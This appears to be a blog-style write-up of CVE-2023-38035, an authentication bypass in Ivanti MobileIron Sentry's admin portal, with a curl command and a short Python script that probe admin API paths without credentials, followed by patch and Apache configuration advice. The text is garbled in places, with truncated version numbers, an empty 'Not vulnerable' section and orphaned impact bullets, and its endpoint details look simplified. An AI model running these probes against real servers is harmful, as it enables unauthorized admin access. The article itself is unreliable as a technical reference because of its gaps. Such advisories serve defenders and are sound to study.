CVE-2023-38035 - How a Simple Config Flaw in Ivanti MobileIron Sentry Exposed Admin Access

In 2023, a security weakness surfaced in the Ivanti MobileIron Sentry product, making waves in the IT security world. Tracked as CVE-2023-38035, this bug involved a simple misconfiguration in the Apache HTTPD server, which opened the door for attackers to bypass authentication and walk straight into the admin interface. If you’re running Ivanti MobileIron Sentry versions 9.18. or lower, this is a must-read.

What Is Ivanti MobileIron Sentry?

Ivanti MobileIron Sentry is designed to be a secure gateway for mobile device traffic within enterprise environments. It controls access to backend systems based on mobile device security status. Sentry is widely used in government, healthcare, and big businesses, making any security bug here a huge risk.

The Vulnerability: Insufficient HTTPD Restrictions

The core of CVE-2023-38035 is all about bad Apache HTTPD configuration. Ideally, sensitive endpoints—like the MICS Admin Portal—should be locked down and require authentication. But, older Sentry versions (9.18. and below) slipped: their config wasn't strict enough.

An attacker only needs access to the admin interface URL; if they find it, the server’s weak setup might let them in _without_ even needing to log in.

Below is a simplified breakdown of what was happening

- The httpd.conf or related Apache config didn’t properly limit access to /mics* URLs.
- Instead of denying unauthenticated requests, it allowed GET/POST requests to sensitive endpoints.
- Attackers could send crafted requests to administrative paths, and the server didn't check authentication headers.

Impacted software:

Ivanti MobileIron Sentry versions 9.18. and below

Not vulnerable:

Exploitation: How Would an Attacker Do It?

Attackers on the same network (or who found an Sentry admin interface exposed to the internet) could access admin functions with nothing more than a browser or simple tools like curl.

Here’s how a basic exploitation might look

# Example: Attempt to access users listing without authentication
curl -k https://example.com:8443/mics/api/v1/users

If the server is vulnerable, it might respond with a list of users _without_ prompting for any authentication.

A more targeted exploit

import requests

url = "https://victim-sentry.example.com:8443/mics/api/v1/admin";
# No authentication provided
r = requests.get(url, verify=False)
print(r.text)  # Should yield admin data if vulnerable

Change server settings

- Add/delete user accounts

Further attacks: Pivot laterally into other systems protected by Sentry.

This is especially scary if your Sentry portals are exposed to the internet. Security companies like Rapid7 found over 1,200 vulnerable instances online when the CVE dropped.

How To Fix

Ivanti released a security advisory and patches:  
- Upgrade to Sentry 9.19. or later (Ivanti advisory)

Sample Apache Config Correction

# Lock down MICS Admin API
<Location /mics>
    AuthType Basic
    AuthName "Restricted Access"
    AuthUserFile /etc/httpd/.htpasswd
    Require valid-user
</Location>

References & Further Reading

- NIST CVE-2023-38035
- Ivanti Security Advisory
- Rapid7 Exposure Report
- Horizon3 Attack Brief

Conclusion

CVE-2023-38035 serves as a reminder: even simple configuration mistakes, like failing to restrict HTTP endpoints, can lead to massive breaches. If you use Ivanti MobileIron Sentry, update _now_, and make sure your critical portals require strong authentication and aren’t internet-facing.

Stay patched. Stay safe.

*Exclusive for readers looking to understand real-world enterprise security risks—share with your IT and security teams!*

Timeline

Published on: 08/21/2023 17:15:00 UTC
Last modified on: 08/24/2023 21:13:00 UTC